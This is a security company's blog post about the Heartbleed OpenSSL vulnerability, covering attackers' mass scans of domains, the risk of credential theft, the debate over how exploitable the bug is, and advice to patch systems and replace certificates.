One of the many services we provide our clients is brand intelligence. This service is usually used by banks and credit unions that want to keep an eye on their brand presence online, as well as any “chatter” about pending or on-going attacks against their infrastructure.
Through the course of our monitoring, we have noticed some interesting activity related to the new SSL “Heartbleed” (link: http://heartbleed.com/) vulnerability. Hackers are posting huge lists of 10,000+ domains that have been run through the automated web-based Heartbleed vulnerability checking tools. This lists described if the web sites are vulnerable, patched, or if SSL was not present. This is not a huge surprise, given how massively prevalent the Heartbleed bug is and how automated tools were quickly created the check for the vulnerability remotely. Chances are that if you run a SSL protected system, it has been assessed or will be assessed by one of these tools. These scans might lead to automated attacks that harvest login credentials en masse. Since we still live in a world filled with single-factor authentication and an over-reliance on out-of-wallet questions, we can expect an increase in account takeover attacks by simply pulling credentials from the memory of vulnerable servers and automatically testing them against other sites.
One disclaimer—if you plan to run these tools against infrastructure that you don’t own, you are probably breaking a few laws in the process, since these tools do not just check OpenSSL version numbers, but actually execute a limited attack which retrieves a small block of memory from the running server.
This vulnerability was discovered by Neel Mehta, now with Google. I had the great pleasure to work with Neel closely for many years while at Internet Security Systems (ISS). Neel is one of the most gifted vulnerability researchers in the world, and is responsible for a number of major discoveries such as this one. There is a lot of talk, mostly amongst other highly gifted vulnerability researchers, about how “exploitable” this vulnerability is in the real world. The current debate centers around the question, "Is it possible to trick a vulnerable server to leak enough memory to reconstruct the private key or not?" If not, it’s still really bad—servers can expose usernames, passwords, contents of encrypted communication. If so, it’s even worse because it would allow decryption of any SSL traffic even after the bug was fixed.
The nature of “exploitability" was something we spent a lot of time on at ISS X-Force. From a practical perspective, a vulnerability is not a vulnerability if it is not reachable, and if it's not reachable it’s not exploitable. In today’s environment filled with automated tools to scrub out the boneheaded stuff, most common software and certainly software as ubiquitous as OpenSSL contains vulnerabilities that are vanishingly difficult to identify, much less reliably exploit in a real world environment (a function of probability of success and the likelihood of crashing the target app or system).
We used to agonize over how to correctly publicize a vulnerability we disclosed on the ISS X-Force team. In almost all cases, we never publicized any vulnerability that we couldn’t write a reliable exploit for to demonstrate the true risk. That might have been the old way of doing things. Another ex-ISSer, Mark Dowd bent space-time to his will by proving in 2008 that null pointer dereference bugs were actually reliably exploitable in the real world. This single stroke took a ton of bugs off the shelf and made them very dangerous and very exploitable. Don’t be penny wise and pound foolish. Patch your systems and replace your certs. Vulnerabilities are provable in the moment, but exploitability generally increases over time.